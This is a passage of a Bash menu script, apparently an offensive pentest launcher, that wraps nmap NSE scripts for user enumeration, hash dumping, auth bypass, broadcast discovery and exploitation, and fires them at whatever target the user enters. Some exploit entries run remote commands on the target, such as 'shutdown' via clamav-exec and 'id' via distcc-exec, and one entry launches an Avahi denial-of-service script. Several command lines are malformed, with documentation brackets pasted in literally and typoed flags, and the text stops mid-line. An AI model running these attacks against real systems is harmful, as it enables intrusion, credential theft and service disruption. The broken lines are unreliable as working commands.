[$okegreen"14"$white]$cyan http-wordpress-users " 810 | echo -e $white" [$okegreen"15"$white]$cyan informix-query " 811 | echo -e $white" [$okegreen"16"$white]$cyan informix-tables " 812 | echo -e $white" [$okegreen"17"$white]$cyan krb5-enum-users " 813 | echo -e $white" [$okegreen"18"$white]$cyan ms-sql-dump-hashes" 814 | echo -e $white" [$okegreen"19"$white]$cyan ms-sql-empty-password " 815 | echo -e $white" [$okegreen"20"$white]$cyan ms-sql-hasdbaccess " 816 | echo -e $white" [$okegreen"21"$white]$cyan mysql-dump-hashes " 817 | echo -e $white" [$okegreen"22"$white]$cyan mysql-empty-password " 818 | echo -e $white" [$okegreen"23"$white]$cyan mysql-query " 819 | echo -e $white" [$okegreen"24"$white]$cyan mysql-users " 820 | echo -e $white" [$okegreen"25"$white]$cyan ncp-enum-users " 821 | echo -e $white" [$okegreen"26"$white]$cyan netbus-auth-bypass " 822 | echo -e $white" [$okegreen"27"$white]$cyan oracle-enum-users " 823 | echo -e $white" [$okegreen"28"$white]$cyan realvnc-auth-bypass " 824 | echo -e $white" [$okegreen"29"$white]$cyan sip-enum-users " 825 | echo -e $white" [$okegreen"30"$white]$cyan smb-enum-users " 826 | echo -e $white" [$okegreen"31"$white]$cyan smtp-enum-users " 827 | echo -e $white" [$okegreen"32"$white]$cyan snmp-win32-users " 828 | echo -e $white" [$okegreen"33"$white]$cyan x11-access " 829 | echo -e $white" [$okegreen"34"$white]$cyan Back " 830 | echo -e " " 831 | echo -n -e $red' \033[4mScreetsec@nse-auth:\033[0m>> '; tput sgr0 #insert your choice 832 | read win 833 | if test $win == '1' 834 | then 835 | echo 836 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 837 | read ip 838 | $urxvt -p 8009 $ip --script ajp-auth [--script-args ajp-auth.path=/login] & 839 | elif test $win == '2' 840 | then 841 | echo 842 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 843 | read ip 844 | $urxvt -sV -sC $ip & 845 | elif test $win == '3' 846 | then 847 | echo 848 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 849 | read ip 850 | echo -ne $okegreen " What is your cmd user: " ; tput sgr0 851 | read user 852 | echo -ne $okegreen " What is your cmd pass: " ; tput sgr0 853 | read pass 854 | $urxvt -p 2050 $ip --script domcon-cmd --script-args domcon-cmd.cmd="show server" domcon-cmd.user="$user",domcon-cmd.pass="$pass" & 855 | elif test $win == '4' 856 | then 857 | echo 858 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 859 | read ip 860 | $urxvt --script domino-enum-users -p 1352 $ip & 861 | elif test $win == '5' 862 | then 863 | echo 864 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 865 | read ip 866 | $urxvt -sV -sC $ip & 867 | elif test $win == '6' 868 | then 869 | echo 870 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 871 | read ip 872 | $urxvt --script http-auth [--script-args http-auth.path=/login] -p80 $ip & 873 | elif test $win == '7' 874 | then 875 | echo 876 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 877 | read ip 878 | echo -ne $okegreen " What is your Port Target " ; tput sgr0 879 | read port 880 | $urxvt --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p $port $ip & 881 | elif test $win == '8' 882 | then 883 | echo 884 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 885 | read ip 886 | $urxvt --script=http-config-backup $ip & 887 | elif test $win == '9' 888 | then 889 | echo 890 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 891 | read ip 892 | $urxvt -p 80 --script http-default-accounts $ip & 893 | elif test $win == '10' 894 | then 895 | echo 896 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 897 | read ip 898 | echo -ne $okegreen " What the username: " ; tput sgr0 899 | read user 900 | echo -ne $okegreen " What the password: " ; tput sgr0 901 | read pass 902 | $urxvt --script domino-enum-passwords -p 80 $ip --script-args domino-enum-passwords.username=$user,domino-enum-passwords.password=$pass & 903 | elif test $win == '11' 904 | then 905 | echo 906 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 907 | read ip 908 | $urxvt p80 --script http-method-tamper --script-args 'http-method-tamper.paths={/protected/db.php,/protected/index.php}' $ip & 909 | elif test $win == '12' 910 | then 911 | echo 912 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 913 | read ip 914 | $urxvt -sV --script=http-userdir-enum $ip & 915 | elif test $win == '13' 916 | then 917 | echo 918 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 919 | read ip 920 | $urxvt --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' $ip & 921 | elif test $win == '14' 922 | then 923 | echo 924 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 925 | read ip 926 | $urxvt -sV --script http-wordpress-users --script-args limit=50 $ip & 927 | elif test $win == '15' 928 | then 929 | echo 930 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 931 | read ip 932 | echo -ne $okegreen " The username used for authentication: " ; tput sgr0 933 | read user 934 | echo -ne $okegreen " The password used for authentication : " ; tput sgr0 935 | read pass 936 | $urxvt -p 9088 $ip --script informix-query --script-args informix-query.username=$user,informix-query.password=$pass & 937 | elif test $win == '16' 938 | then 939 | echo 940 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 941 | read ip 942 | echo -ne $okegreen " The username used for authentication: " ; tput sgr0 943 | read user 944 | echo -ne $okegreen " The password used for authentication : " ; tput sgr0 945 | read pass 946 | $urxvt -p 9088 $ip --script informix-tables --script-args informix-tables.username=$user,informix-tables.password=$pass & 947 | elif test $win == '17' 948 | then 949 | echo 950 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 951 | read ip 952 | $urxvt -p 88 $ip --script krb5-enum-users --script-args krb5-enum-users.realm='test' & 953 | elif test $win == '18' 954 | then 955 | echo 956 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 957 | read ip 958 | $urxvt -p 1433 $ip --script ms-sql-dump-hashes & 959 | elif test $win == '19' 960 | then 961 | echo 962 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 963 | read ip 964 | echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0 965 | read port 966 | $urxvt -p $port --script ms-sql-empty-password --script-args mssql.instance-all $ip & 967 | elif test $win == '20' 968 | then 969 | echo 970 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 971 | read ip 972 | echo -ne $okegreen " The username used for authentication: " ; tput sgr0 973 | read user 974 | echo -ne $okegreen " The password used for authentication : " ; tput sgr0 975 | read pass 976 | $urxvt -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=$user,mssql.password=$pass $ip & 977 | elif test $win == '21' 978 | then 979 | echo 980 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 981 | read ip 982 | echo -ne $okegreen " The username to use to connect to the server " ; tput sgr0 983 | read user 984 | echo -ne $okegreen " The password to use to connect to the server: " ; tput sgr0 985 | read pass 986 | $urxvt -p 3306 $ip --script mysql-dump-hashes --script-args="username=$user,password=$pass" & 987 | elif test $win == '22' 988 | then 989 | echo 990 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 991 | read ip 992 | $urxvt -sV --script=mysql-empty-password $ip & 993 | elif test $win == '23' 994 | then 995 | echo 996 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 997 | read ip 998 | echo -ne $okegreen " The username to use to connect to the server (Optional):" ; tput sgr0 999 | read user 1000 | echo -ne $okegreen " The password to use to connect to the server (Optional): " ; tput sgr0 1001 | read pass 1002 | echo -ne $okegreen " The query for which to return the results " ; tput sgr0 1003 | read query 1004 | $urxvt -p 3306 $ip --script mysql-query --script-args="query="$query"[,username=$username,password=$pass]" & 1005 | elif test $win == '24' 1006 | then 1007 | echo 1008 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1009 | read ip 1010 | $urxvt -sV --script=mysql-users $ip & 1011 | elif test $win == '25' 1012 | then 1013 | echo 1014 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1015 | read ip 1016 | $urxvt -sV --script=ncp-enum-users $ip & 1017 | elif test $win == '26' 1018 | then 1019 | echo 1020 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1021 | read ip 1022 | $urxvt -p 12345 --script netbus-auth-bypass $ip & 1023 | elif test $win == '27' 1024 | then 1025 | echo 1026 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1027 | read ip 1028 | $urxvt --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 $ip & 1029 | elif test $win == '28' 1030 | then 1031 | echo 1032 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1033 | read ip 1034 | $urxvt -sV -sC $ip & 1035 | elif test $win == '29' 1036 | then 1037 | echo 1038 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1039 | read ip 1040 | $urxvt --script=sip-enum-users -sU -p 5060 $ip & 1041 | elif test $win == '30' 1042 | then 1043 | echo 1044 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1045 | read ip 1046 | $urxvt -script smb-enum-users.nse -p 445 $ip & 1047 | elif test $win == '31' 1048 | then 1049 | echo 1050 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1051 | read ip 1052 | $urxvt --script smtp-enum-users.nse [--script-args smtp-enum-users.methods={EXPN,...},...] -p 25,465,587 $ip & 1053 | elif test $win == '32' 1054 | then 1055 | echo 1056 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1057 | read ip 1058 | $urxvt -sU -p 161 --script=snmp-win32-users $ip & 1059 | elif test $win == '33' 1060 | then 1061 | echo 1062 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1063 | read ip 1064 | $urxvt --sV -sC $ip & 1065 | elif test $win == '34' 1066 | then 1067 | nse 1068 | else 1069 | echo "" 1070 | echo -e $okegreen " Incorrect Number" 1071 | fi 1072 | echo "" 1073 | echo "" 1074 | echo -n -e $red " Back to Last Menu? ( Yes / No ) :" 1075 | read back 1076 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 1077 | then 1078 | clear 1079 | menu 1080 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 1081 | then 1082 | auth 1083 | fi 1084 | } 1085 | 1086 | function brd () { 1087 | clear 1088 | echo 1089 | echo 1090 | echo -e $white" [$okegreen"01"$white]$cyan broadcast-ataoe-discover " 1091 | echo -e $white" [$okegreen"02"$white]$cyan broadcast-avahi-dos " 1092 | echo -e $white" [$okegreen"03"$white]$cyan broadcast-bjnp-discover " 1093 | echo -e $white" [$okegreen"04"$white]$cyan broadcast-db2-discover " 1094 | echo -e $white" [$okegreen"05"$white]$cyan broadcast-dhcp-discover " 1095 | echo -e $white" [$okegreen"06"$white]$cyan broadcast-dhcp6-discover " 1096 | echo -e $white" [$okegreen"07"$white]$cyan broadcast-dns-service-discovery " 1097 | echo -e $white" [$okegreen"08"$white]$cyan broadcast-dropbox-listener " 1098 | echo -e $white" [$okegreen"09"$white]$cyan broadcast-eigrp-discovery " 1099 | echo -e $white" [$okegreen"10"$white]$cyan broadcast-igmp-discovery " 1100 | echo -e $white" [$okegreen"11"$white]$cyan broadcast-listener " 1101 | echo -e $white" [$okegreen"12"$white]$cyan broadcast-ms-sql-discover " 1102 | echo -e $white" [$okegreen"13"$white]$cyan broadcast-netbios-master-browser " 1103 | echo -e $white" [$okegreen"14"$white]$cyan broadcast-networker-discover " 1104 | echo -e $white" [$okegreen"15"$white]$cyan broadcast-novell-locate " 1105 | echo -e $white" [$okegreen"16"$white]$cyan broadcast-pc-anywhere " 1106 | echo -e $white" [$okegreen"17"$white]$cyan broadcast-pc-duo " 1107 | echo -e $white" [$okegreen"18"$white]$cyan broadcast-pim-discovery " 1108 | echo -e $white" [$okegreen"19"$white]$cyan broadcast-ping " 1109 | echo -e $white" [$okegreen"20"$white]$cyan broadcast-pppoe-discover " 1110 | echo -e $white" [$okegreen"21"$white]$cyan broadcast-rip-discover " 1111 | echo -e $white" [$okegreen"22"$white]$cyan broadcast-ripng-discover " 1112 | echo -e $white" [$okegreen"23"$white]$cyan broadcast-sonicwall-discover " 1113 | echo -e $white" [$okegreen"24"$white]$cyan broadcast-sybase-asa-discover " 1114 | echo -e $white" [$okegreen"25"$white]$cyan broadcast-tellstick-discover " 1115 | echo -e $white" [$okegreen"26"$white]$cyan broadcast-upnp-info " 1116 | echo -e $white" [$okegreen"27"$white]$cyan broadcast-versant-locate " 1117 | echo -e $white" [$okegreen"28"$white]$cyan broadcast-wake-on-lan " 1118 | echo -e $white" [$okegreen"29"$white]$cyan broadcast-wpad-discover " 1119 | echo -e $white" [$okegreen"30"$white]$cyan broadcast-wsdd-discover " 1120 | echo -e $white" [$okegreen"31"$white]$cyan broadcast-xdmcp-discover " 1121 | echo -e $white" [$okegreen"32"$white]$cyan eap-info " 1122 | echo -e $white" [$okegreen"33"$white]$cyan ipv6-multicast-mld-list " 1123 | echo -e $white" [$okegreen"34"$white]$cyan knx-gateway-discover " 1124 | echo -e $white" [$okegreen"35"$white]$cyan llmnr-resolve " 1125 | echo -e $white" [$okegreen"36"$white]$cyan lltd-discovery " 1126 | echo -e $white" [$okegreen"37"$white]$cyan mrinfo " 1127 | echo -e $white" [$okegreen"38"$white]$cyan mtrace " 1128 | echo -e $white" [$okegreen"39"$white]$cyan targets-ipv6-multicast-echo " 1129 | echo -e $white" [$okegreen"40"$white]$cyan targets-ipv6-multicast-invalid-dst " 1130 | echo -e $white" [$okegreen"41"$white]$cyan targets-ipv6-multicast-mld " 1131 | echo -e $white" [$okegreen"42"$white]$cyan targets-ipv6-multicast-slaac " 1132 | echo -e $white" [$okegreen"43"$white]$cyan targets-sniffer " 1133 | echo -e $white" [$okegreen"44"$white]$cyan back " 1134 | echo -n -e $red' \033[4mScreetsec@nse-broadcast:\033[0m>> '; tput sgr0 #insert your choice 1135 | read min 1136 | if test $min == '1' 1137 | then 1138 | echo 1139 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1140 | read ie 1141 | $urxvt --script broadcast-ataoe-discover -e $ie & 1142 | elif test $min == '2' 1143 | then 1144 | echo 1145 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1146 | read ie 1147 | $urxvt --script=broadcast-avahi-dos -e $ie & 1148 | elif test $min == '3' 1149 | then 1150 | echo 1151 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1152 | read ie 1153 | $urxvt --script broadcast-bjnp-discover -e $ie & 1154 | elif test $min == '4' 1155 | then 1156 | echo 1157 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1158 | read ie 1159 | $urxvt --script db2-discover -e $ie & 1160 | elif test $min == '5' 1161 | then 1162 | echo 1163 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1164 | read ie 1165 | $urxvt --script broadcast-dhcp-discover -e $ie & 1166 | elif test $min == '6' 1167 | then 1168 | echo 1169 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1170 | read ie 1171 | $urxvt -6 --script broadcast-dhcp6-discover -e $ie & 1172 | elif test $min == '7' 1173 | then 1174 | echo 1175 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1176 | read ie 1177 | $urxvt --script=broadcast-dns-service-discovery -e $ie & 1178 | elif test $min == '8' 1179 | then 1180 | echo 1181 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1182 | read ie 1183 | $urxvt --script=broadcast-dropbox-listener --script-args=newtargets -Pn -e $ie & 1184 | elif test $min == '9' 1185 | then 1186 | echo 1187 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1188 | read ip 1189 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1190 | read ie 1191 | $urxvt --script=broadcast-eigrp-discovery $ip -e $ie & 1192 | elif test $min == '10' 1193 | then 1194 | echo 1195 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1196 | read ie 1197 | $urxvt --script broadcast-igmp-discovery -e $ie & 1198 | elif test $min == '11' 1199 | then 1200 | echo 1201 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1202 | read ie 1203 | $urxvt --script broadcast-listener -e $ie & 1204 | elif test $min == '12' 1205 | then 1206 | echo 1207 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1208 | read ie 1209 | $urxvt nmap --script broadcast-ms-sql-discover -e $ie & 1210 | elif test $min == '13' 1211 | then 1212 | echo 1213 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1214 | read ie 1215 | $urxvt --script=broadcast-netbios-master-browser -e $ie & 1216 | elif test $min == '14' 1217 | then 1218 | echo 1219 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1220 | read ie 1221 | $urxvt --script broadcast-networker-discover -e $ie & 1222 | elif test $min == '15' 1223 | then 1224 | echo 1225 | echo -ne $okegreen " What is your Targets" ; tput sgr0 1226 | read ie 1227 | $urxvt -sV --script=broadcast-novell-locate $ie & 1228 | elif test $min == '16' 1229 | then 1230 | echo 1231 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1232 | read ie 1233 | $urxvt --script broadcast-pc-anywhere -e $ie & 1234 | elif test $min == '17' 1235 | then 1236 | echo 1237 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1238 | read ie 1239 | $urxvt --script broadcast-pc-duo -e $ie & 1240 | elif test $min == '18' 1241 | then 1242 | echo 1243 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1244 | read ie 1245 | $urxvt nmap --script broadcast-pim-discovery -e $ie & 1246 | elif test $min == '19' 1247 | then 1248 | echo 1249 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1250 | read ie 1251 | echo -ne $okegreen " Default value for TTL is 64 & the length of the payload is 0" ; tput sgr0 1252 | read ttl 1253 | echo -ne $okegreen " The payload is consisted of random bytes." ; tput sgr0 1254 | read payload 1255 | echo -ne $okegreen " Timespec specifying how long to wait for response (default 3s)" ; tput sgr0 1256 | read ti 1257 | echo -ne $okegreen " Number specifying how many ICMP probes should be sent (default 1)" ; tput sgr0 1258 | read np 1259 | $urxvt -e $ie [--ttl $ttl] [--data-length $payload] --script broadcast-ping [--script-args [broadcast-ping.timeout=$ti],[num-probes=$np]]] & 1260 | elif test $min == '20' 1261 | then 1262 | echo 1263 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1264 | read ie 1265 | $urxvt --script broadcast-pppoe-discover -e $ie & 1266 | elif test $min == '21' 1267 | then 1268 | echo 1269 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1270 | read ie 1271 | $urxvt --script broadcast-rip-discover -e $ie & 1272 | elif test $min == '22' 1273 | then 1274 | echo 1275 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1276 | read ie 1277 | $urxvt --script broadcast-ripng-discover -e $ie & 1278 | elif test $min == '23' 1279 | then 1280 | echo 1281 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1282 | read ie 1283 | $urxvt -e $ie --script broadcast-sonicwall-discover & 1284 | elif test $min == '24' 1285 | then 1286 | echo 1287 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1288 | read ie 1289 | $urxvt --script broadcast-sybase-asa-discover -e $ie & 1290 | elif test $min == '25' 1291 | then 1292 | echo 1293 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1294 | read ie 1295 | $urxvt --script broadcast-tellstick-discover -e $ie & 1296 | elif test $min == '26' 1297 | then 1298 | echo 1299 | echo -ne $okegreen " What is your Targets" ; tput sgr0 1300 | read ip 1301 | $urxvt -sV --script=broadcast-upnp-info $ip & 1302 | elif test $min == '27' 1303 | then 1304 | echo 1305 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1306 | read ie 1307 | $urxvt --script broadcast-versant-locate -e $ie & 1308 | elif test $min == '28' 1309 | then 1310 | echo 1311 | echo -ne $okegreen " The MAC address of the remote system to wake up" ; tput sgr0 1312 | read mac 1313 | $urxvt --script broadcast-wake-on-lan --script-args broadcast-wake-on-lan.MAC="$mac" & 1314 | elif test $min == '29' 1315 | then 1316 | echo 1317 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1318 | read ie 1319 | $urxvt --script broadcast-wpad-discover -e $ie & 1320 | elif test $min == '30' 1321 | then 1322 | echo 1323 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1324 | read ie 1325 | $urxvt --script broadcast-wsdd-discover -e $ie & 1326 | elif test $min == '31' 1327 | then 1328 | echo 1329 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1330 | read ie 1331 | $urxvt --script broadcast-xdmcp-discover -e $ie & 1332 | elif test $min == '32' 1333 | then 1334 | echo 1335 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1336 | read ip 1337 | $urxvt -e interface --script eap-info [--script-args="eap-info.identity=0-user,eap-info.scan={13,50}"] $ip & 1338 | elif test $min == '33' 1339 | then 1340 | echo 1341 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1342 | read ie 1343 | $urxvt --script=ipv6-multicast-mld-list -e $ie & 1344 | elif test $min == '34' 1345 | then 1346 | echo 1347 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1348 | read ie 1349 | $urxvt --script knx-gateway-discover -e $ie & 1350 | elif test $min == '35' 1351 | then 1352 | echo 1353 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1354 | read ie 1355 | echo -ne $okegreen " Hostname to resolve : " ; tput sgr0 1356 | read hostname 1357 | $urxvt --script llmnr-resolve --script-args "llmnr-resolve.hostname=$hostname" -e $ie & 1358 | elif test $min == '36' 1359 | then 1360 | echo 1361 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1362 | read ie 1363 | $urxvt -e $ie --script lltd-discovery & 1364 | elif test $min == '37' 1365 | then 1366 | echo 1367 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1368 | read ie 1369 | $urxvt --script mrinfo -e $ie & 1370 | elif test $min == '38' 1371 | then 1372 | echo 1373 | echo -ne $okegreen " Source address from which to traceroute." ; tput sgr0 1374 | read rt 1375 | $urxvt --script mtrace --script-args "mtrace.fromip=$rt" & 1376 | elif test $min == '39' 1377 | then 1378 | echo 1379 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1380 | read ie 1381 | $urxvt --script=targets-ipv6-multicast-echo.nse --script-args "newtargets,interface=$ie" -sL & 1382 | elif test $min == '40' 1383 | then 1384 | echo 1385 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1386 | read ie 1387 | $urxvt --script=targets-ipv6-multicast-invalid-dst.nse --script-args "newtargets,interface=$ie" -sP & 1388 | elif test $min == '41' 1389 | then 1390 | echo 1391 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1392 | read ie 1393 | $urxvt --script=targets-ipv6-multicast-mld.nse --script-args "newtargets,interface=$ie" & 1394 | elif test $min == '42' 1395 | then 1396 | echo 1397 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1398 | read ie 1399 | $urxvt --script targets-ipv6-multicast-slaac --script-args "newtargets,interface=$ie" -sP & 1400 | elif test $min == '43' 1401 | then 1402 | echo 1403 | echo -ne $okegreen " What is your Interfaces" ; tput sgr0 1404 | read ie 1405 | $urxvt -sL --script=targets-sniffer --script-args=newtargets,targets-sniffer.timeout=5s,targets-sniffer.iface=$ie & 1406 | elif test $min == '44' 1407 | then 1408 | nse 1409 | else 1410 | echo "" 1411 | echo -e $okegreen " Incorrect Number" 1412 | fi 1413 | echo "" 1414 | echo "" 1415 | echo -n -e $red " Back to Last Menu? ( Yes / No ) :" 1416 | read back 1417 | if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ] 1418 | then 1419 | clear 1420 | menu 1421 | elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ] 1422 | then 1423 | brd 1424 | fi 1425 | } 1426 | 1427 | function exploit () { 1428 | clear 1429 | echo 1430 | echo 1431 | echo -e $white" [$okegreen"01"$white]$cyan afp-path-vuln " 1432 | echo -e $white" [$okegreen"02"$white]$cyan clamav-exec " 1433 | echo -e $white" [$okegreen"03"$white]$cyan distcc-cve2004-2687 " 1434 | echo -e $white" [$okegreen"04"$white]$cyan ftp-proftpd-backdoor " 1435 | echo -e $white" [$okegreen"05"$white]$cyan ftp-vsftpd-backdoor " 1436 | echo -e $white" [$okegreen"06"$white]$cyan http-adobe-coldfusion-apsa1301 " 1437 | echo -e $white" [$okegreen"07"$white]$cyan http-avaya-ipoffice-users " 1438 | echo -e $white" [$okegreen"08"$white]$cyan http-awstatstotals-exec " 1439 | echo -e $white" [$okegreen"09"$white]$cyan http-axis2-dir-traversal " 1440 | echo -e $white" [$okegreen"10"$white]$cyan http-barracuda-dir-traversal " 1441 | echo -e $white" [$okegreen"11"$white]$cyan http-coldfusion-subzero " 1442 | echo -e $white" [$okegreen"12"$white]$cyan http-csrf " 1443 | echo -e $white" [$okegreen"13"$white]$cyan http-dlink-backdoor " 1444 | echo -e $white" [$okegreen"14"$white]$cyan http-dombased-xss " 1445 | echo -e $white" [$okegreen"15"$white]$cyan http-fileupload-exploiter " 1446 | echo -e $white" [$okegreen"16"$white]$cyan http-huawei-hg5xx-vuln " 1447 | echo -e $white" [$okegreen"17"$white]$cyan http-litespeed-sourcecode-download " 1448 | echo -e $white" [$okegreen"18"$white]$cyan http-majordomo2-dir-traversal " 1449 | echo -e $white" [$okegreen"19"$white]$cyan http-phpmyadmin-dir-traversal " 1450 | echo -e $white" [$okegreen"20"$white]$cyan http-shellshock " 1451 | echo -e $white" [$okegreen"21"$white]$cyan http-stored-xss " 1452 | echo -e $white" [$okegreen"22"$white]$cyan http-tplink-dir-traversal " 1453 | echo -e $white" [$okegreen"23"$white]$cyan http-vuln-cve2006-3392 " 1454 | echo -e $white" [$okegreen"24"$white]$cyan http-vuln-cve2009-3960 " 1455 | echo -e $white" [$okegreen"25"$white]$cyan http-vuln-cve2012-1823 " 1456 | echo -e $white" [$okegreen"26"$white]$cyan http-vuln-cve2013-0156 " 1457 | echo -e $white" [$okegreen"27"$white]$cyan http-vuln-cve2013-6786 " 1458 | echo -e $white" [$okegreen"28"$white]$cyan http-vuln-cve2013-7091 " 1459 | echo -e $white" [$okegreen"29"$white]$cyan http-vuln-cve2014-3704 " 1460 | echo -e $white" [$okegreen"30"$white]$cyan http-vuln-cve2014-8877 " 1461 | echo -e $white" [$okegreen"31"$white]$cyan http-vuln-wnr1000-creds " 1462 | echo -e $white" [$okegreen"32"$white]$cyan irc-unrealircd-backdoor " 1463 | echo -e $white" [$okegreen"33"$white]$cyan jdwp-exec " 1464 | echo -e $white" [$okegreen"34"$white]$cyan jdwp-inject " 1465 | echo -e $white" [$okegreen"35"$white]$cyan qconn-exec " 1466 | echo -e $white" [$okegreen"36"$white]$cyan smb-vuln-conficker " 1467 | echo -e $white" [$okegreen"37"$white]$cyan smb-vuln-cve2009-3103 " 1468 | echo -e $white" [$okegreen"38"$white]$cyan smb-vuln-ms06-025 " 1469 | echo -e $white" [$okegreen"39"$white]$cyan smb-vuln-ms07-029 " 1470 | echo -e $white" [$okegreen"40"$white]$cyan smb-vuln-ms08-067 " 1471 | echo -e $white" [$okegreen"41"$white]$cyan smb-vuln-regsvc-dos " 1472 | echo -e $white" [$okegreen"42"$white]$cyan smtp-vuln-cve2010-4344 " 1473 | echo -e $white" [$okegreen"43"$white]$cyan supermicro-ipmi-conf " 1474 | echo -e $white" [$okegreen"44"$white]$cyan back " 1475 | echo -e " " 1476 | echo -n -e $red' \033[4mScreetsec@nse-exploit:\033[0m>> '; tput sgr0 #insert your choice 1477 | read cin 1478 | if test $cin == '1' 1479 | then 1480 | echo 1481 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1482 | read ip 1483 | $urxvt -sV --script=afp-path-vuln $ip & 1484 | elif test $cin == '2' 1485 | then 1486 | echo 1487 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1488 | read ip 1489 | $urxvt --script clamav-exec --script-args cmd='shutdown' $ip & 1490 | elif test $cin == '3' 1491 | then 1492 | echo 1493 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1494 | read ip 1495 | $urxvt -p 3632 $ip --script distcc-exec --script-args="distcc-exec.cmd='id'" & 1496 | elif test $cin == '4' 1497 | then 1498 | echo 1499 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1500 | read ip 1501 | $urxvt --script ftp-proftpd-backdoor -p 21 $ip & 1502 | elif test $cin == '5' 1503 | then 1504 | echo 1505 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1506 | read ip 1507 | $urxvt --script ftp-vsftpd-backdoor -p 21 $ip & 1508 | elif test $cin == '6' 1509 | then 1510 | echo 1511 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1512 | read ip 1513 | $urxvt -p80 --script http-adobe-coldfusion-apsa1301 --script-args basepath=/cf/adminapi/ $ip & 1514 | elif test $cin == '7' 1515 | then 1516 | echo 1517 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1518 | read ip 1519 | $urxvt -sV --script http-avaya-ipoffice-users $ip & 1520 | elif test $cin == '8' 1521 | then 1522 | echo 1523 | echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0 1524 | read ip 1525 | $urxvt -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", 